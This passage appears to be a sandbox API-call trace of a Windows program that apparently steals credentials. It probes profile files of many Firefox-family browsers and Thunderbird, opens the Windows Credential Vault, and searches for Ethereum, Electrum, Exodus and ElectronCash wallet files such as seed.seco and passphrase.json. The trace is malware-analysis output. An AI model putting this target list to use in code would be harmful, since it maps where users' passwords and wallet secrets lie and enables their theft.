pszPath=0x19d41c | out: pszPath="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming") returned 0x0 [0207.179] lstrcatA (in: lpString1="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming", lpString2="\\FlashPeak\\SlimBrowser\\Profiles" | out: lpString1="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\FlashPeak\\SlimBrowser\\Profiles") returned="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\FlashPeak\\SlimBrowser\\Profiles" [0207.179] lstrcatA (in: lpString1="", lpString2="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\FlashPeak\\SlimBrowser\\Profiles" | out: lpString1="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\FlashPeak\\SlimBrowser\\Profiles") returned="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\FlashPeak\\SlimBrowser\\Profiles" [0207.179] lstrcatA (in: lpString1="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\FlashPeak\\SlimBrowser\\Profiles", lpString2="..\\profiles.ini" | out: lpString1="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\FlashPeak\\SlimBrowser\\Profiles..\\profiles.ini") returned="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\FlashPeak\\SlimBrowser\\Profiles..\\profiles.ini" [0207.179] GetFileAttributesA (lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\FlashPeak\\SlimBrowser\\Profiles..\\profiles.ini" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\roaming\\flashpeak\\slimbrowser\\profiles..\\profiles.ini")) returned 0xffffffff [0207.180] SHGetFolderPathA (in: hwnd=0x0, csidl=32794, hToken=0x0, dwFlags=0x0, pszPath=0x19d41c | out: pszPath="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming") returned 0x0 [0207.180] lstrcatA (in: lpString1="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming", lpString2="\\Moonchild Productions\\Pale Moon\\Profiles\\" | out: lpString1="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\Moonchild Productions\\Pale Moon\\Profiles\\") returned="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\Moonchild Productions\\Pale Moon\\Profiles\\" [0207.180] lstrcatA (in: lpString1="", lpString2="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\Moonchild Productions\\Pale Moon\\Profiles\\" | out: lpString1="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\Moonchild Productions\\Pale Moon\\Profiles\\") returned="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\Moonchild Productions\\Pale Moon\\Profiles\\" [0207.180] lstrcatA (in: lpString1="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\Moonchild Productions\\Pale Moon\\Profiles\\", lpString2="..\\profiles.ini" | out: lpString1="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\Moonchild Productions\\Pale Moon\\Profiles\\..\\profiles.ini") returned="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\Moonchild Productions\\Pale Moon\\Profiles\\..\\profiles.ini" [0207.181] GetFileAttributesA (lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\Moonchild Productions\\Pale Moon\\Profiles\\..\\profiles.ini" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\roaming\\moonchild productions\\pale moon\\profiles.ini")) returned 0xffffffff [0207.181] SHGetFolderPathA (in: hwnd=0x0, csidl=32794, hToken=0x0, dwFlags=0x0, pszPath=0x19d41c | out: pszPath="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming") returned 0x0 [0207.181] lstrcatA (in: lpString1="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming", lpString2="\\Waterfox\\Profiles\\" | out: lpString1="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\Waterfox\\Profiles\\") returned="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\Waterfox\\Profiles\\" [0207.181] lstrcatA (in: lpString1="", lpString2="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\Waterfox\\Profiles\\" | out: lpString1="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\Waterfox\\Profiles\\") returned="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\Waterfox\\Profiles\\" [0207.181] lstrcatA (in: lpString1="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\Waterfox\\Profiles\\", lpString2="..\\profiles.ini" | out: lpString1="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\Waterfox\\Profiles\\..\\profiles.ini") returned="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\Waterfox\\Profiles\\..\\profiles.ini" [0207.181] GetFileAttributesA (lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\Waterfox\\Profiles\\..\\profiles.ini" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\roaming\\waterfox\\profiles.ini")) returned 0xffffffff [0207.181] SHGetFolderPathA (in: hwnd=0x0, csidl=32794, hToken=0x0, dwFlags=0x0, pszPath=0x19d41c | out: pszPath="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming") returned 0x0 [0207.182] lstrcatA (in: lpString1="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming", lpString2="\\8pecxstudios\\Cyberfox\\Profiles\\" | out: lpString1="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\8pecxstudios\\Cyberfox\\Profiles\\") returned="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\8pecxstudios\\Cyberfox\\Profiles\\" [0207.182] lstrcatA (in: lpString1="", lpString2="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\8pecxstudios\\Cyberfox\\Profiles\\" | out: lpString1="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\8pecxstudios\\Cyberfox\\Profiles\\") returned="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\8pecxstudios\\Cyberfox\\Profiles\\" [0207.182] lstrcatA (in: lpString1="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\8pecxstudios\\Cyberfox\\Profiles\\", lpString2="..\\profiles.ini" | out: lpString1="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\8pecxstudios\\Cyberfox\\Profiles\\..\\profiles.ini") returned="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\8pecxstudios\\Cyberfox\\Profiles\\..\\profiles.ini" [0207.182] GetFileAttributesA (lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\8pecxstudios\\Cyberfox\\Profiles\\..\\profiles.ini" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\roaming\\8pecxstudios\\cyberfox\\profiles.ini")) returned 0xffffffff [0207.182] SHGetFolderPathA (in: hwnd=0x0, csidl=32794, hToken=0x0, dwFlags=0x0, pszPath=0x19d41c | out: pszPath="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming") returned 0x0 [0207.182] lstrcatA (in: lpString1="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming", lpString2="\\NETGATE Technologies\\BlackHawk\\Profiles\\" | out: lpString1="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\NETGATE Technologies\\BlackHawk\\Profiles\\") returned="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\NETGATE Technologies\\BlackHawk\\Profiles\\" [0207.182] lstrcatA (in: lpString1="", lpString2="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\NETGATE Technologies\\BlackHawk\\Profiles\\" | out: lpString1="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\NETGATE Technologies\\BlackHawk\\Profiles\\") returned="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\NETGATE Technologies\\BlackHawk\\Profiles\\" [0207.182] lstrcatA (in: lpString1="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\NETGATE Technologies\\BlackHawk\\Profiles\\", lpString2="..\\profiles.ini" | out: lpString1="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\NETGATE Technologies\\BlackHawk\\Profiles\\..\\profiles.ini") returned="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\NETGATE Technologies\\BlackHawk\\Profiles\\..\\profiles.ini" [0207.182] GetFileAttributesA (lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\NETGATE Technologies\\BlackHawk\\Profiles\\..\\profiles.ini" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\roaming\\netgate technologies\\blackhawk\\profiles.ini")) returned 0xffffffff [0207.183] SHGetFolderPathA (in: hwnd=0x0, csidl=32794, hToken=0x0, dwFlags=0x0, pszPath=0x19d41c | out: pszPath="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming") returned 0x0 [0207.183] lstrcatA (in: lpString1="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming", lpString2="\\Mozilla\\icecat\\Profiles\\" | out: lpString1="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\Mozilla\\icecat\\Profiles\\") returned="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\Mozilla\\icecat\\Profiles\\" [0207.183] lstrcatA (in: lpString1="", lpString2="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\Mozilla\\icecat\\Profiles\\" | out: lpString1="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\Mozilla\\icecat\\Profiles\\") returned="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\Mozilla\\icecat\\Profiles\\" [0207.183] lstrcatA (in: lpString1="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\Mozilla\\icecat\\Profiles\\", lpString2="..\\profiles.ini" | out: lpString1="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\Mozilla\\icecat\\Profiles\\..\\profiles.ini") returned="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\Mozilla\\icecat\\Profiles\\..\\profiles.ini" [0207.183] GetFileAttributesA (lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\Mozilla\\icecat\\Profiles\\..\\profiles.ini" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\roaming\\mozilla\\icecat\\profiles.ini")) returned 0xffffffff [0207.183] SHGetFolderPathA (in: hwnd=0x0, csidl=32794, hToken=0x0, dwFlags=0x0, pszPath=0x19d41c | out: pszPath="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming") returned 0x0 [0207.184] lstrcatA (in: lpString1="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming", lpString2="\\K-Meleon\\" | out: lpString1="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\K-Meleon\\") returned="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\K-Meleon\\" [0207.184] lstrcatA (in: lpString1="", lpString2="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\K-Meleon\\" | out: lpString1="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\K-Meleon\\") returned="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\K-Meleon\\" [0207.184] lstrcatA (in: lpString1="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\K-Meleon\\", lpString2="..\\profiles.ini" | out: lpString1="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\K-Meleon\\..\\profiles.ini") returned="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\K-Meleon\\..\\profiles.ini" [0207.184] GetFileAttributesA (lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\K-Meleon\\..\\profiles.ini" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\roaming\\profiles.ini")) returned 0xffffffff [0207.184] SHGetFolderPathA (in: hwnd=0x0, csidl=32794, hToken=0x0, dwFlags=0x0, pszPath=0x19d41c | out: pszPath="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming") returned 0x0 [0207.185] lstrcatA (in: lpString1="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming", lpString2="\\Thunderbird\\Profiles\\" | out: lpString1="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\Thunderbird\\Profiles\\") returned="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\Thunderbird\\Profiles\\" [0207.185] lstrcatA (in: lpString1="", lpString2="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\Thunderbird\\Profiles\\" | out: lpString1="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\Thunderbird\\Profiles\\") returned="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\Thunderbird\\Profiles\\" [0207.185] lstrcatA (in: lpString1="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\Thunderbird\\Profiles\\", lpString2="..\\profiles.ini" | out: lpString1="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\Thunderbird\\Profiles\\..\\profiles.ini") returned="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\Thunderbird\\Profiles\\..\\profiles.ini" [0207.185] GetFileAttributesA (lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\Thunderbird\\Profiles\\..\\profiles.ini" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\roaming\\thunderbird\\profiles.ini")) returned 0xffffffff [0207.185] GetVersionExA (in: lpVersionInformation=0x19d280*(dwOSVersionInfoSize=0x94, dwMajorVersion=0x0, dwMinorVersion=0x0, dwBuildNumber=0x0, dwPlatformId=0x0, szCSDVersion="") | out: lpVersionInformation=0x19d280*(dwOSVersionInfoSize=0x94, dwMajorVersion=0x6, dwMinorVersion=0x2, dwBuildNumber=0x23f0, dwPlatformId=0x2, szCSDVersion="")) returned 1 [0207.185] VaultOpenVault () returned 0x0 [0207.187] VaultEnumerateItems () returned 0x0 [0207.188] VaultFree () returned 0x0 [0207.188] VaultCloseVault () returned 0x0 [0207.189] lstrlenA (lpString="") returned 0 [0207.192] _mbsicmp (_Str1=0x19d4c5, _Str2=0x416c4c) returned -1 [0207.192] _mbsicmp (_Str1=0x19d4c5, _Str2=0x416c50) returned -1 [0207.192] _mbsicmp (_Str1=0x19d4c5, _Str2=0x416c58) returned -1 [0207.192] _mbsicmp (_Str1=0x19d4c5, _Str2=0x416c60) returned 1 [0207.192] _mbsicmp (_Str1=0x19d4c5, _Str2=0x416c68) returned 1 [0207.192] _mbsicmp (_Str1=0x19d4c5, _Str2=0x416c70) returned 1 [0207.192] _mbsicmp (_Str1=0x19d4c5, _Str2=0x416c78) returned 1 [0207.192] _mbsicmp (_Str1=0x19d4c5, _Str2=0x416c7c) returned 1 [0207.192] FreeLibrary (hLibModule=0x60900000) returned 1 [0207.193] free (_Block=0x5804a0) [0207.193] fflush (in: _File=0x0 | out: _File=0x0) returned 0 [0207.294] FreeLibrary (hLibModule=0x0) returned 0 [0207.298] SHGetFolderPathA (in: hwnd=0x0, csidl=32794, hToken=0x0, dwFlags=0x0, pszPath=0x19d414 | out: pszPath="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming") returned 0x0 [0207.299] lstrcatA (in: lpString1="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming", lpString2="\\Ethereum\\" | out: lpString1="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\Ethereum\\") returned="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\Ethereum\\" [0207.299] SetCurrentDirectoryA (lpPathName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\Ethereum\\" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\roaming\\ethereum")) returned 0 [0207.299] wsprintfA (in: param_1=0x19d2ec, param_2="%s\\%s" | out: param_1="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\Ethereum\\\\keystore") returned 56 [0207.299] FindFirstFileA (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\Ethereum\\\\keystore", lpFindFileData=0x19d1a4 | out: lpFindFileData=0x19d1a4*(dwFileAttributes=0x26, ftCreationTime.dwLowDateTime=0x19d1c0, ftCreationTime.dwHighDateTime=0x75be0115, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x19d1dc, ftLastWriteTime.dwLowDateTime=0x19d414, ftLastWriteTime.dwHighDateTime=0x104, nFileSizeHigh=0x19d3e8, nFileSizeLow=0x74f8dc10, dwReserved0=0x19d1dc, dwReserved1=0x19d414, cFileName="\x04\x01", cAlternateFileName="")) returned 0xffffffff [0207.300] SHGetFolderPathA (in: hwnd=0x0, csidl=32794, hToken=0x0, dwFlags=0x0, pszPath=0x19d414 | out: pszPath="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming") returned 0x0 [0207.300] lstrcatA (in: lpString1="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming", lpString2="\\Electrum\\wallets\\" | out: lpString1="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\Electrum\\wallets\\") returned="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\Electrum\\wallets\\" [0207.300] SetCurrentDirectoryA (lpPathName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\Electrum\\wallets\\" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\roaming\\electrum\\wallets")) returned 0 [0207.300] wsprintfA (in: param_1=0x19d2ec, param_2="%s\\%s" | out: param_1="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\Electrum\\wallets\\\\*.*") returned 59 [0207.300] FindFirstFileA (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\Electrum\\wallets\\\\*.*", lpFindFileData=0x19d1a4 | out: lpFindFileData=0x19d1a4*(dwFileAttributes=0x26, ftCreationTime.dwLowDateTime=0x19d1c0, ftCreationTime.dwHighDateTime=0x75be0115, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x19d1dc, ftLastWriteTime.dwLowDateTime=0x19d414, ftLastWriteTime.dwHighDateTime=0x104, nFileSizeHigh=0x19d3e8, nFileSizeLow=0x74f8dc10, dwReserved0=0x19d1dc, dwReserved1=0x19d414, cFileName="\x04\x01", cAlternateFileName="")) returned 0xffffffff [0207.300] SHGetFolderPathA (in: hwnd=0x0, csidl=32794, hToken=0x0, dwFlags=0x0, pszPath=0x19d414 | out: pszPath="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming") returned 0x0 [0207.301] lstrcatA (in: lpString1="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming", lpString2="\\Electrum-LTC\\wallets\\" | out: lpString1="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\Electrum-LTC\\wallets\\") returned="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\Electrum-LTC\\wallets\\" [0207.301] SetCurrentDirectoryA (lpPathName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\Electrum-LTC\\wallets\\" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\roaming\\electrum-ltc\\wallets")) returned 0 [0207.301] wsprintfA (in: param_1=0x19d2ec, param_2="%s\\%s" | out: param_1="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\Electrum-LTC\\wallets\\\\*.*") returned 63 [0207.301] FindFirstFileA (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\Electrum-LTC\\wallets\\\\*.*", lpFindFileData=0x19d1a4 | out: lpFindFileData=0x19d1a4*(dwFileAttributes=0x26, ftCreationTime.dwLowDateTime=0x19d1c0, ftCreationTime.dwHighDateTime=0x75be0115, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x19d1dc, ftLastWriteTime.dwLowDateTime=0x19d414, ftLastWriteTime.dwHighDateTime=0x104, nFileSizeHigh=0x19d3e8, nFileSizeLow=0x74f8dc10, dwReserved0=0x19d1dc, dwReserved1=0x19d414, cFileName="\x04\x01", cAlternateFileName="")) returned 0xffffffff [0207.301] SHGetFolderPathA (in: hwnd=0x0, csidl=32794, hToken=0x0, dwFlags=0x0, pszPath=0x19d414 | out: pszPath="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming") returned 0x0 [0207.301] lstrcatA (in: lpString1="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming", lpString2="\\Exodus\\" | out: lpString1="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\Exodus\\") returned="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\Exodus\\" [0207.301] SetCurrentDirectoryA (lpPathName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\Exodus\\" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\roaming\\exodus")) returned 0 [0207.302] wsprintfA (in: param_1=0x19d2ec, param_2="%s\\%s" | out: param_1="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\Exodus\\\\exodus.conf.json") returned 62 [0207.302] FindFirstFileA (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\Exodus\\\\exodus.conf.json", lpFindFileData=0x19d1a4 | out: lpFindFileData=0x19d1a4*(dwFileAttributes=0x26, ftCreationTime.dwLowDateTime=0x19d1c0, ftCreationTime.dwHighDateTime=0x75be0115, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x19d1dc, ftLastWriteTime.dwLowDateTime=0x19d414, ftLastWriteTime.dwHighDateTime=0x104, nFileSizeHigh=0x19d3e8, nFileSizeLow=0x74f8dc10, dwReserved0=0x19d1dc, dwReserved1=0x19d414, cFileName="\x04\x01", cAlternateFileName="")) returned 0xffffffff [0207.302] SHGetFolderPathA (in: hwnd=0x0, csidl=32794, hToken=0x0, dwFlags=0x0, pszPath=0x19d414 | out: pszPath="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming") returned 0x0 [0207.302] lstrcatA (in: lpString1="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming", lpString2="\\Exodus\\" | out: lpString1="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\Exodus\\") returned="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\Exodus\\" [0207.302] SetCurrentDirectoryA (lpPathName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\Exodus\\" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\roaming\\exodus")) returned 0 [0207.302] wsprintfA (in: param_1=0x19d2ec, param_2="%s\\%s" | out: param_1="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\Exodus\\\\window-state.json") returned 63 [0207.302] FindFirstFileA (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\Exodus\\\\window-state.json", lpFindFileData=0x19d1a4 | out: lpFindFileData=0x19d1a4*(dwFileAttributes=0x26, ftCreationTime.dwLowDateTime=0x19d1c0, ftCreationTime.dwHighDateTime=0x75be0115, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x19d1dc, ftLastWriteTime.dwLowDateTime=0x19d414, ftLastWriteTime.dwHighDateTime=0x104, nFileSizeHigh=0x19d3e8, nFileSizeLow=0x74f8dc10, dwReserved0=0x19d1dc, dwReserved1=0x19d414, cFileName="\x04\x01", cAlternateFileName="")) returned 0xffffffff [0207.302] SHGetFolderPathA (in: hwnd=0x0, csidl=32794, hToken=0x0, dwFlags=0x0, pszPath=0x19d414 | out: pszPath="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming") returned 0x0 [0207.303] lstrcatA (in: lpString1="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming", lpString2="\\Exodus\\exodus.wallet\\" | out: lpString1="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\Exodus\\exodus.wallet\\") returned="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\Exodus\\exodus.wallet\\" [0207.303] SetCurrentDirectoryA (lpPathName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\Exodus\\exodus.wallet\\" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\roaming\\exodus\\exodus.wallet")) returned 0 [0207.303] wsprintfA (in: param_1=0x19d2ec, param_2="%s\\%s" | out: param_1="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\Exodus\\exodus.wallet\\\\passphrase.json") returned 75 [0207.303] FindFirstFileA (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\Exodus\\exodus.wallet\\\\passphrase.json", lpFindFileData=0x19d1a4 | out: lpFindFileData=0x19d1a4*(dwFileAttributes=0x26, ftCreationTime.dwLowDateTime=0x19d1c0, ftCreationTime.dwHighDateTime=0x75be0115, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x19d1dc, ftLastWriteTime.dwLowDateTime=0x19d414, ftLastWriteTime.dwHighDateTime=0x104, nFileSizeHigh=0x19d3e8, nFileSizeLow=0x74f8dc10, dwReserved0=0x19d1dc, dwReserved1=0x19d414, cFileName="\x04\x01", cAlternateFileName="")) returned 0xffffffff [0207.303] SHGetFolderPathA (in: hwnd=0x0, csidl=32794, hToken=0x0, dwFlags=0x0, pszPath=0x19d414 | out: pszPath="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming") returned 0x0 [0207.303] lstrcatA (in: lpString1="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming", lpString2="\\Exodus\\exodus.wallet\\" | out: lpString1="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\Exodus\\exodus.wallet\\") returned="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\Exodus\\exodus.wallet\\" [0207.303] SetCurrentDirectoryA (lpPathName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\Exodus\\exodus.wallet\\" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\roaming\\exodus\\exodus.wallet")) returned 0 [0207.303] wsprintfA (in: param_1=0x19d2ec, param_2="%s\\%s" | out: param_1="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\Exodus\\exodus.wallet\\\\seed.seco") returned 69 [0207.303] FindFirstFileA (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\Exodus\\exodus.wallet\\\\seed.seco", lpFindFileData=0x19d1a4 | out: lpFindFileData=0x19d1a4*(dwFileAttributes=0x26, ftCreationTime.dwLowDateTime=0x19d1c0, ftCreationTime.dwHighDateTime=0x75be0115, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x19d1dc, ftLastWriteTime.dwLowDateTime=0x19d414, ftLastWriteTime.dwHighDateTime=0x104, nFileSizeHigh=0x19d3e8, nFileSizeLow=0x74f8dc10, dwReserved0=0x19d1dc, dwReserved1=0x19d414, cFileName="\x04\x01", cAlternateFileName="")) returned 0xffffffff [0207.304] SHGetFolderPathA (in: hwnd=0x0, csidl=32794, hToken=0x0, dwFlags=0x0, pszPath=0x19d414 | out: pszPath="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming") returned 0x0 [0207.304] lstrcatA (in: lpString1="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming", lpString2="\\Exodus\\exodus.wallet\\" | out: lpString1="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\Exodus\\exodus.wallet\\") returned="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\Exodus\\exodus.wallet\\" [0207.304] SetCurrentDirectoryA (lpPathName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\Exodus\\exodus.wallet\\" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\roaming\\exodus\\exodus.wallet")) returned 0 [0207.304] wsprintfA (in: param_1=0x19d2ec, param_2="%s\\%s" | out: param_1="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\Exodus\\exodus.wallet\\\\info.seco") returned 69 [0207.304] FindFirstFileA (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\Exodus\\exodus.wallet\\\\info.seco", lpFindFileData=0x19d1a4 | out: lpFindFileData=0x19d1a4*(dwFileAttributes=0x26, ftCreationTime.dwLowDateTime=0x19d1c0, ftCreationTime.dwHighDateTime=0x75be0115, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x19d1dc, ftLastWriteTime.dwLowDateTime=0x19d414, ftLastWriteTime.dwHighDateTime=0x104, nFileSizeHigh=0x19d3e8, nFileSizeLow=0x74f8dc10, dwReserved0=0x19d1dc, dwReserved1=0x19d414, cFileName="\x04\x01", cAlternateFileName="")) returned 0xffffffff [0207.304] SHGetFolderPathA (in: hwnd=0x0, csidl=32794, hToken=0x0, dwFlags=0x0, pszPath=0x19d414 | out: pszPath="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming") returned 0x0 [0207.305] lstrcatA (in: lpString1="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming", lpString2="\\ElectronCash\\wallets\\" | out: lpString1="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\ElectronCash\\wallets\\") returned="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\ElectronCash\\wallets\\" [0207.305] SetCurrentDirectoryA 